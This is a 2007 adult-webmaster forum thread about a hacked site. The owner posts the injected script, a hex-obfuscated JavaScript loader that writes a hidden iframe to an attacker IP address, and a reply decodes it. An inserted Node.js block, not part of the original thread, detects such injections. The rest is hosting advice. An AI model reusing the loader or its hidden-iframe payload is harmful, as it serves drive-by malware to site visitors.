GoFuckYourself.com - Adult Webmaster Forum

One of my sites hacked, question about code (https://gfy.com/showthread.php?t=791943)

Global-X 12-13-2007 03:10 PM

One of my sites hacked, question about code
 
So I just found out someone managed to add some javascript/exploit to one of my sites. No idea yet how they got in, site is running on smartthumbs/atx, all other sites on the server are fine.

Anyone got an idea what this code is doing:

<script> var s='3C696672616D65207372633D22687474703A2F2F3139352 E352E3131362E3235302F65782F7374617469632E706870222 077696474683D32206865696768743D32207374796C653D226 46973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

High Class Grass 12-13-2007 03:13 PM

nothing to worry about, ur just paranoid

Global-X 12-13-2007 03:15 PM

Quote:

Originally Posted by High Class Grass (Post 13510376)
nothing to worry about, ur just paranoid

You smoke too much

Nookster 12-13-2007 03:15 PM

Let me throw a wild guess into the wind. Hosting at webair?? LOL

Global-X 12-13-2007 03:20 PM

Quote:

Originally Posted by Nookster (Post 13510405)
Let me throw a wild guess into the wind. Hosting at webair?? LOL


This server is with webair yes, please explain, I just reset my ftp password

Nookster 12-13-2007 03:23 PM

Quote:

Originally Posted by Global-X (Post 13510427)
This server is with webair yes, please explain, I just reset my ftp password

Get a more reliable host. I've noticed patterns developing with webair and that "mystical" javascript code showing up magically in the headers of sites hosted on webair. Something is being exploited within the webair administration interface for sure. Just don't know what. :2 cents:

Global-X 12-13-2007 03:31 PM

Quote:

Originally Posted by Nookster (Post 13510439)
Get a more reliable host. I've noticed patterns developing with webair and that "mystical" javascript code showing up magically in the headers of sites hosted on webair. Something is being exploited within the webair administration interface for sure. Just don't know what. :2 cents:

It's true that I never experienced anything like this with my servers at nationalnet or phatservers but I thought webair has a good reputation, lots of webmasters using them

pastafari 12-14-2007 02:47 AM

http://www.gofuckyourself.com/showthread.php?t=787142

:(:(:(:(:(:(:(

Violetta 12-14-2007 02:55 AM

time to change your ftp login!

Global-X 12-14-2007 03:32 AM

Quote:

Originally Posted by Rockatansky (Post 13512682)
time to change your ftp login!

I wish it was that simple

boneless 12-14-2007 03:45 AM

Since I keep my templates in comus and st set to 644 or 444 permissions I haven't had any iframes added to my pages anymore.

drjones 12-14-2007 07:30 AM

The code writes this to your web pages:

<iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>
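
The decoding described in the post above can be reproduced without running the script. The following Node.js code is an added example, not part of the original thread: it scans page or template source for script blocks that build markup from a long hex string and reports the iframe they would write. The function names, the 40-character minimum and the "tiny frame" heuristic are assumptions; the sample is the script quoted in the first post.

```javascript
// Script quoted in the first post, kept with the spaces the forum inserted
// into the long hex string. It is only ever treated as text here.
const THREAD_SAMPLE =
  "<script> var s='3C696672616D65207372633D22687474703A2F2F3139352 " +
  "E352E3131362E3235302F65782F7374617469632E706870222 " +
  "077696474683D32206865696768743D32207374796C653D226 " +
  "46973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; " +
  "for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); " +
  "o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>";

// Turn a run of hex digits into text. Whitespace inside the run is ignored;
// odd-length or non-hex input returns null. Nothing is evaluated or fetched.
function decodeHex(hex) {
  const clean = hex.replace(/\s+/g, '');
  if (clean.length % 2 !== 0 || !/^[0-9a-fA-F]+$/.test(clean)) return null;
  return Buffer.from(clean, 'hex').toString('latin1');
}

// Report every iframe that a hex-obfuscated script block in `source` would inject.
function findInjectedIframes(source) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let block;
  while ((block = scriptRe.exec(source)) !== null) {
    const body = block[1];
    // Only look at blocks that use the decoding helpers seen in the thread's script.
    if (!/unescape|fromCharCode/.test(body)) continue;
    // Assumed threshold: a quoted literal of 40 or more hex digits.
    const literalRe = /(['"])((?:[0-9a-fA-F]\s*){40,})\1/g;
    let lit;
    while ((lit = literalRe.exec(body)) !== null) {
      const decoded = decodeHex(lit[2]);
      if (decoded === null) continue;
      const frame = /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)[^>]*>/i.exec(decoded);
      if (!frame) continue;
      // Assumed heuristic: display:none, or a width/height of 0 to 2 pixels.
      const hidden = /display\s*:\s*none/i.test(frame[0]) ||
        /\b(?:width|height)\s*=\s*["']?[0-2]\b/i.test(frame[0]);
      findings.push({ offset: block.index, src: frame[1], hidden, decoded });
    }
  }
  return findings;
}

console.log(findInjectedIframes(THREAD_SAMPLE));
```

Run over each template file's contents, a non-empty result gives the offset of the script block to remove and the address the hidden frame pointed at.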

Quickdraw 12-14-2007 07:43 AM

Did you upgrade your ATX recently? They had a security update last week I believe.

miroz 12-14-2007 08:04 AM

read this: http://askdamage.com/t21776-p2-we-ne...urity-now.html

Global-X 12-14-2007 08:04 AM

Quote:

Originally Posted by drjones (Post 13513387)
The code writes this to your web pages:

<iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>

Thanks for the info

Global-X 12-14-2007 08:14 AM

Quote:

Originally Posted by miroz (Post 13513458)


Hmmm......... seems I'm not the only one, chmodded my smart thumbs templates to 444 and until now I'm fine again

million 12-14-2007 08:40 AM

get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap

Global-X 12-14-2007 09:35 AM

Quote:

Originally Posted by million (Post 13513588)
get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap

What do you mean with oversold?? It's a dedicated server with zero downtime since 1 year+, so far I'm happy with them

monstergalleriesdotnet 12-21-2007 01:12 PM

bummpppppp

jo3 12-21-2007 01:51 PM

this happened to one of my SSH accounts last week

TURN THAT SHIT OFF UNLESS YOU NEED IT

the script interprets out to an invisible iframe... go figure =/

again, secure your sites by turning off ssh and contact your host to see any more information they can dig up for you and to protect it from happening in the future.


All times are GMT -7.